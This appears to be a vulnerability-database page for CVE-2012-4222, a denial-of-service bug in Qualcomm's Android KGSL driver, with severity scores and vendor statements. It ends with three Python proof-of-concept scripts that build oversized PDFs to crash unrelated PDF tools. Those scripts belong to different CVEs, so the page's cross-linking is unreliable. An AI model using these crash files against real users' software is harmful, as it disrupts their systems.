CVE-2012-4222
published 2012-11-30CVE-2012-4222: drivers/gpu/msm/kgsl.c in the Qualcomm Innovation Center (QuIC) Graphics KGSL kernel-mode driver for Android 2.3 through 4.2 allows attackers to cause a denial…
PriorityP413medium4.3CVSS 2.0
AVNACMAuNCNINAP
EPSS
0.69%
49.4th percentile
drivers/gpu/msm/kgsl.c in the Qualcomm Innovation Center (QuIC) Graphics KGSL kernel-mode driver for Android 2.3 through 4.2 allows attackers to cause a denial of service (NULL pointer dereference) via an application that uses crafted arguments in a local kgsl_ioctl call.
Affected
23 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | linux | — | — |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — |
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:N/A:P
vendor_debian4.3LOW
vendor_redhat4.3MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Debian
CVE-2012-4222: linux - drivers/gpu/msm/kgsl.c in the Qualcomm Innovation Center (QuIC) Graphics KGSL ke...
vendor_debian·2012·CVSS 4.3
CVE-2012-4222 [MEDIUM] CVE-2012-4222: linux - drivers/gpu/msm/kgsl.c in the Qualcomm Innovation Center (QuIC) Graphics KGSL ke...
drivers/gpu/msm/kgsl.c in the Qualcomm Innovation Center (QuIC) Graphics KGSL kernel-mode driver for Android 2.3 through 4.2 allows attackers to cause a denial of service (NULL pointer dereference) via an application that uses crafted arguments in a local kgsl_ioctl call.
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixie: resolved
Red Hat
CVE-2012-4222: drivers/gpu/msm/kgsl
vendor_redhat·CVSS 4.3
CVE-2012-4222 [MEDIUM] CVE-2012-4222: drivers/gpu/msm/kgsl
drivers/gpu/msm/kgsl.c in the Qualcomm Innovation Center (QuIC) Graphics KGSL kernel-mode driver for Android 2.3 through 4.2 allows attackers to cause a denial of service (NULL pointer dereference) via an application that uses crafted arguments in a local kgsl_ioctl call.
Statement: Not vulnerable. This issue did not affect the versions of Linux kernel as
shipped with Red Hat Enterprise Linux 5, 6 and Red Hat Enterprise MRG 2 as
they did not provide support for the Graphics KGSL kernel mode driver for Android.
GHSA
GHSA-rr7r-w572-mrq7: drivers/gpu/msm/kgsl
ghsa_unreviewed·2022-05-17
CVE-2012-4222 [MEDIUM] CWE-20 GHSA-rr7r-w572-mrq7: drivers/gpu/msm/kgsl
drivers/gpu/msm/kgsl.c in the Qualcomm Innovation Center (QuIC) Graphics KGSL kernel-mode driver for Android 2.3 through 4.2 allows attackers to cause a denial of service (NULL pointer dereference) via an application that uses crafted arguments in a local kgsl_ioctl call.
No detection rules found.
Exploit-DB
Able2Doc and Able2Doc Professional 6.0 - Memory Corruption
exploitdb·2012-06-25
CVE-2011-4222 Able2Doc and Able2Doc Professional 6.0 - Memory Corruption
Able2Doc and Able2Doc Professional 6.0 - Memory Corruption
---
# Exploit Title: Able2Doc and Able2Doc Professional v 6.0 memory corruption
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.investintech.com
# Version:6.0
# Tested on: Windows 7
# CVE : cve-2011-4221
payload ="B"*13000
crash="startxref"
pdf=payload+crash
filename = "slimpdPoC.pdf"
file = open(filename,"w")
file.writelines(pdf)
file.close()
Exploit-DB
Able2Extract and Able2Extract Server 6.0 - Memory Corruption
exploitdb·2012-06-25
CVE-2011-4222 Able2Extract and Able2Extract Server 6.0 - Memory Corruption
Able2Extract and Able2Extract Server 6.0 - Memory Corruption
---
# Exploit Title: Able2Extract and Able2Extract Server v 6.0 Memory
Corruption
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.investintech.com
# Version:6.0
# Tested on: Windows 7
# CVE : cve-2011-4222
payload ="A"*12000
crash="startxref"
pdf=payload+crash
filename = "slimpdPoC.pdf"
file = open(filename,"w")
file.writelines(pdf)
file.close()
Exploit-DB
Slimpdf Reader 1.0 - Memory Corruption
exploitdb·2012-06-25
CVE-2011-4222 Slimpdf Reader 1.0 - Memory Corruption
Slimpdf Reader 1.0 - Memory Corruption
---
# Exploit Title:
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.investintech.com
# Version:1.0
# Tested on: Windows 7
# CVE : cve-2011-4220
payload ="A"*10000
crash="startxref"
pdf=payload+crash
filename = "slimpdPoC.pdf"
file = open(filename,"w")
file.writelines(pdf)
file.close()
http://www.kb.cert.org/vuls/id/702452https://www.codeaurora.org/projects/security-advisories/multiple-issues-diagkgsl-system-call-handling-cve-2012-4220-cve-2012http://www.kb.cert.org/vuls/id/702452https://www.codeaurora.org/projects/security-advisories/multiple-issues-diagkgsl-system-call-handling-cve-2012-4220-cve-2012
2012-11-30
Published